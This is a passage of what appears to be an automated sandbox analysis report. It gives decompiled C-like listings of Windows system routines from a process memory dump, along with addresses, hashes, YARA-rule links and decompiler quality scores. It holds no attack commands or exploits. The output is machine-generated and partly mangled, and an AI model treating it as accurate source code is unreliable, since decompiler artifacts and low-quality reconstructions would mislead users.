						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x51787e8 = _t30;
						 *0x51787e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E050DD0D1(L05114320());
			}

0x05114257
0x05114257
0x05114257
0x05114259
0x0511425e
0x05114263
0x05114265
0x05114273
0x05114278
0x0511427c
0x0511427f
0x05114281
0x05114287
0x051142d7
0x051142d7
0x051142da
0x0511428d
0x0511428d
0x0511428f
0x05114292
0x05114297
0x0511429c
0x051142a0
0x051142a6
0x051142a8
0x051142ae
0x051142b3
0x00000000
0x051142ba
0x051142ba
0x051142bf
0x051142c5
0x051142ca
0x051142cf
0x051142d0
0x00000000
0x051142d0
0x051142b3
0x00000000
0x051142a6
0x0511429c
0x051142dc
0x051142dc
0x051142e3
0x05114309
0x051142e5
0x051142e5
0x051142e8
0x051142ee
0x051142f0
0x00000000
0x051142f2
0x051142f2
0x051142f4
0x051142f7
0x051142f9
0x05114300
0x05114300
0x051142f0
0x0511430e
0x0511431f

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c08c1069dea3ab616528168f98f7250b7f218b0d3cd805d8e29f22fdbf4a76cc
Instruction ID: b5017df41be24d6f56178e1f938ef760e8ea101c3d89d501e3959a616da343e7
Opcode Fuzzy Hash: c08c1069dea3ab616528168f98f7250b7f218b0d3cd805d8e29f22fdbf4a76cc
Instruction Fuzzy Hash: 43218B70611704DFDB25EF28E009A68BBB2FB89715B2082EAD546AF2D0DB7194C1CF04

Uniqueness

Uniqueness Score: -1.00%

Function 050B2397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E050B2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x517848c != 0) {
					L050AFAD0(0x5178610);
					if( *0x517848c == 0) {
						E050AFA00(0x5178610, _t19, _t27, 0x5178610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = L050B2581(0x5178610, 0x50650a0, _t26, _t27, _t28);
						E050AFA00(0x5178610, 0x50650a0, _t27, 0x5178610);
					}
				} else {
					L1:
					_t11 =  *0x5178614; // 0x0
					if(_t11 == 0) {
						_t11 = E050C4886(0x5061088, 1, 0x5178614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = L050B2581(0x5178610, (_t11 << 4) + 0x5065070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x050b23b0
0x050b23b6
0x050b2409
0x050b2415
0x050f5ae9
0x00000000
0x050b241b
0x050b241b
0x050b241d
0x050b2427
0x050b242e
0x050b2430
0x050b2430
0x050b23b8
0x050b23b8
0x050b23b8
0x050b23bf
0x050b23fc
0x050b23fc
0x050b23c1
0x050b23c3
0x050b23d0
0x050b23d8
0x050b23d8
0x050b23dc
0x050b23de
0x050b23e1
0x050b23e1
0x050b23ec

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ed4009deab74e87e5f7f327faf9cf8acf237e6681fa4cada3d9361f2018e9e
Instruction ID: ae3eec89f916474461b8ef4290a3a460b84584afdd5c972b1cd61bc5cdf08561
Opcode Fuzzy Hash: 37ed4009deab74e87e5f7f327faf9cf8acf237e6681fa4cada3d9361f2018e9e
Instruction Fuzzy Hash: FF11087674430277F630A629BCC8B9DB6E9BB60A20F544526F603A7190DAF0E840C758

Uniqueness

Uniqueness Score: -1.00%

Function 051046A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E051046A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L050A4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E050CF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E050BD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L050A77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x051046b7
0x051046ba
0x051046c5
0x051046c8
0x051046d0
0x051046d4
0x051046e6
0x051046e9
0x051046f4
0x051046ff
0x05104705
0x05104706
0x0510470c
0x05104713
0x0510471b
0x05104723
0x05104725
0x051046d6
0x051046d9
0x051046db
0x051046db
0x05104732

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: a95598ea09430a87891510899b868d77534234babe20744b9465ae3742d526b4
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 05112572A04208BBCB159F5CE8808BEBBB9EF95300F1080AEF944C7350DA718D51C3A5

Uniqueness

Uniqueness Score: -1.00%

Function 0508C962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0508C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x517d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0509EEF0(0x51770a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0510F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0509EB70(_t29, 0x51770a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E050CB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0510F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x51770c0; // 0x0
					while(_t38 != 0x51770c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x517b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0508c96a
0x0508c974
0x0508c988
0x0508c98a
0x050f7c9d
0x050f7c9f
0x050f7ca4
0x050f7cae
0x050f7cf0
0x050f7cf5
0x050f7cfa
0x0508c992
0x0508c996
0x0508c997
0x0508c998
0x0508c9a3
0x0508c9a3
0x050f7cb0
0x050f7cb7
0x050f7cbb
0x00000000
0x00000000
0x050f7cbd
0x050f7ce8
0x050f7cc5
0x050f7cc8
0x050f7cca
0x050f7cd0
0x050f7cd6
0x050f7cde
0x050f7ce4
0x050f7ce4
0x050f7cd0
0x00000000
0x050f7ce8
0x0508c990
0x00000000

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f66335fa889df944d784e98a17e4e649ad896fb77f7d5a1a239d7927fc29bb
Instruction ID: 1ec7a0919d1aa4c9faff9fc9740743661d7af22506b78552dddca0484d50761f
Opcode Fuzzy Hash: d6f66335fa889df944d784e98a17e4e649ad896fb77f7d5a1a239d7927fc29bb
Instruction Fuzzy Hash: 4711C23131060A9BCB50AF2CE84A96F7BF6FB85614F00052CFA8597A90DF20ED54D7D2

Uniqueness

Uniqueness Score: -1.00%

Function 050C37F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E050C37F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E050A2280(_t6, 0x5178550);
				}
				_t29 = E050C387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0509FFB0(0x5178550, _t27, 0x5178550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x050c37fa
0x050c37fc
0x050c3805
0x050c3808
0x050c3808
0x050c3814
0x050c3818
0x050c3846
0x050c3848
0x050c384b
0x050c384b
0x050c3852
0x00000000
0x050c3854
0x050c3856
0x00000000
0x00000000
0x050c3863
0x00000000
0x050c3863
0x050c381a
0x050c381a
0x050c381f
0x050c386e
0x050c386e
0x050c3871
0x050c3873
0x050c3873
0x050c3868
0x00000000
0x050c3868
0x050c3821
0x050c3826
0x00000000
0x00000000
0x050c3828
0x050c382a
0x050c3841
0x00000000
0x050c3841

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b58e765bc0104e983a79a2ecb894b216d0c3beda007d4c32c15ed81b150439f
Instruction ID: 3831f41d424912e08656f3d57a900667c70bbab6d650e6050cb1957bbfc1506d
Opcode Fuzzy Hash: 0b58e765bc0104e983a79a2ecb894b216d0c3beda007d4c32c15ed81b150439f
Instruction Fuzzy Hash: 9F01E572A117115BC327CB19B540EAE7FF7EF83A5071588ADF4058B200D730C804C790

Uniqueness

Uniqueness Score: -1.00%

Function 050B002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050B002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E050A7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E050A7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E050A7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E050A7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x050b0032
0x050b0037
0x050b0043
0x050f4b3a
0x050b0049
0x050b0049
0x050b0049
0x050b004e
0x050b0053
0x050f4b48
0x050f4b5a
0x050f4b4a
0x050f4b53
0x050f4b53
0x050f4b5f
0x00000000
0x050f4b61
0x00000000
0x050f4b61
0x050b0059
0x050b0059
0x050b0060
0x050f4b6f
0x050f4b6f
0x050b0069
0x050f4b83
0x00000000
0x00000000
0x050f4b90
0x050f4b9b
0x050f4b9b
0x050f4ba4
0x00000000
0x00000000
0x050f4baa
0x00000000
0x050b006f
0x050b006f
0x00000000
0x050b006f
0x050b0069

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 154aec881ffaa780fe315277915818afbc466b123fc85a3a03693da4cb27962e
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: F611C232215AC08FEB62CB64E998B7F37E6FB41754F0900A0DE0587A93E76AD841C750

Uniqueness

Uniqueness Score: -1.00%

Function 0509766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0509766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E050BF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E050BF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L050A4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x05097672
0x0509767f
0x05097689
0x050976de
0x050976de
0x0509768b
0x05097691
0x05097693
0x05097697
0x00000000
0x05097699
0x050976a8
0x00000000
0x050976aa
0x050976ad
0x050976b1
0x00000000
0x050976b3
0x050976b3
0x050976b5
0x050976ba
0x050976bc
0x050976bc
0x050976c0
0x00000000
0x050976c2
0x050976ce
0x050976ce
0x050976c0
0x050976b1
0x050976a8
0x05097697
0x050976d9

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 7c9f21c6bac8fe58f74ed4cc4116a238aa4cae1f5d1ab5a395d88bb871e44b92
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 8101D433720159ABCB34DE5EEC44EAF77ADEB85A60F250134B909CB288DA70DC0193A0

Uniqueness

Uniqueness Score: -1.00%

Function 0511C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0511C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E050C9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E050C95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E050C95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E050C95D0();
				return L050A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0511c458
0x0511c45d
0x0511c466
0x0511c468
0x0511c469
0x0511c46a
0x0511c46b
0x0511c46e
0x0511c46f
0x0511c471
0x0511c476
0x0511c476
0x0511c47c
0x0511c47e
0x0511c480
0x0511c480
0x0511c483
0x0511c484
0x0511c486
0x0511c488
0x0511c48f
0x0511c491
0x0511c493
0x0511c493
0x0511c48f
0x0511c498
0x0511c49e
0x0511c4ad
0x0511c4ad
0x0511c4b2
0x0511c4b4
0x0511c4cd

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
Associated: 00000014.00000002.505802947.000000000517F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: fec772526b7a1e89704ec6db29305a868abc9a39f2f9561661adc34a3333f558
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 7B01D272280505FFE721AF65DD84EAAFB6DFF65394F004529F10442960CB21ACA0CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 05089080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E05089080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x51785ec;
				E050A2280(_t48, 0x51785ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0509FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x517538c; // 0x77f068c8
					if( *_t84 != 0x5175388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x515f6e8);
						E050DD0E8(0x51785ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E051588F5(_t80, _t85, 0x5175388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x51786c0; // 0x33607b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x51786b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E050A2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E051588F5(0x51785ec, _t85, 0x5175388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E050CAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x517b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x51784c0;
																			if(_t82 >=  *0x51784c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E05159063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0508922A(_t99);
										_t64 = E050A7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E05158B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x51786c0; // 0x33607b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x51786b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x51786bc;
													_t87 = 0x51786b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E05089240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x51786c4;
												_t87 = 0x51786c0;
												L27:
												E050B9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E050DD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x5175388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x517538c = _t51;
						goto L6;
					}
				}
			}

0x05089082
0x05089083
0x05089084
0x05089085
0x05089087
0x05089096
0x05089098
0x05089098
0x0508909e
0x050890a8
0x050890e7
0x050890e7
0x050890aa
0x050890b0
0x050890b7
0x050890bd
0x050890dd
0x050890e6
0x050890bf
0x050890bf
0x050890c7
0x050890cf
0x050890f1
0x050890f2
0x050890f4
0x050890f5
0x050890f6
0x050890f7
0x050890f8
0x050890f9
0x050890fa
0x050890fb
0x050890fc
0x050890fd
0x050890fe
0x050890ff
0x05089100
0x05089102
0x05089107
0x0508910c
0x05089110
0x05089113
0x05089115
0x05089136
0x0508913f
0x05089143
0x050e37e4
0x050e37e4
0x05089117
0x05089117
0x0508911d
0x00000000
0x0508911f
0x0508911f
0x05089125
0x00000000
0x05089127
0x0508912d
0x05089130
0x05089134
0x05089158
0x0508915d
0x05089161
0x05089168
0x050e3715
0x0508916e
0x0508916e
0x05089175
0x05089177
0x0508917e
0x0508917f
0x05089182
0x05089182
0x05089187
0x05089187
0x0508918a
0x0508918d
0x0508918f
0x05089192
0x05089195
0x05089198
0x05089198
0x05089198
0x0508919a
0x00000000
0x00000000
0x050e371f
0x050e3721
0x050e3727
0x050e372f
0x050e3733
0x050e3735
0x050e3738
0x050e373b
0x050e373d
0x050e3740
0x00000000
0x050e3746
0x050e3746
0x050e3749
0x00000000
0x050e374f
0x050e374f
0x050e3751
0x050e3757
0x050e3759
0x050e375c
0x050e375c
0x050e375e
0x050e375e
0x050e3761
0x050e3764
0x00000000
0x00000000
0x050e3766
0x050e3768
0x050e37a3
0x050e37a3
0x050e37a5
0x050e37a7
0x050e37ad
0x050e37b0
0x050e37b2
0x050e37bc
0x050e37c2
0x050e37c2
0x050e37b2
0x05089187
0x05089187
0x0508918a
0x0508918d
0x0508918f
0x05089192
0x05089195
0x00000000
0x05089195
0x00000000
0x050e376a
0x050e376a
0x050e376a
0x050e376c
0x050e376c
0x050e376f
0x050e3775
0x00000000
0x00000000
0x050e3777
0x050e3779
0x050e3782
0x050e3787
0x050e3789
0x050e3790
0x050e3790
0x050e378b
0x050e378b
0x050e378b
0x050e3792
0x050e3795
0x00000000
0x050e3795
0x00000000
0x050e3779
0x050e3798
0x00000000
0x050e3798
0x00000000
0x050e3768
0x050e379b
0x050e379b
0x050e3751
0x050e3749
0x00000000
0x050e3740
0x050891a0
0x050891a3
0x050891a9
0x050891b0
0x00000000
0x050891b0
0x05089187
0x050891b4
0x050891b4
0x050891bb
0x050891c0
0x050891c5
0x050891c7
0x050e37da
0x050891cd
0x050891cd
0x050891cd
0x050891d2
0x050891d5
0x05089239
0x05089239
0x050891d7
0x050891db
0x050891e1
0x050891e7
0x050891fd
0x05089203
0x0508921e
0x05089223
0x00000000
0x05089205
0x05089205
0x05089208
0x0508920c
0x05089214
0x05089214
0x0508920c
0x050891e9
0x050891e9
0x050891ee
0x050891f3
0x050891f3
0x050891f3
0x050891e7
0x00000000
0x00000000
0x00000000
0x05089134
0x05089125
0x0508911d
0x0508914e
0x050890d1
0x050890d1
0x050890d3
0x050890d6
0x050890d8
0x00000000
0x050890d8
0x050890cf

Memory Dump Source

Source File: 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: true

Associated: 00000014.00000002.505764738.000000000517B000.00000040.00000001.sdmp Download File
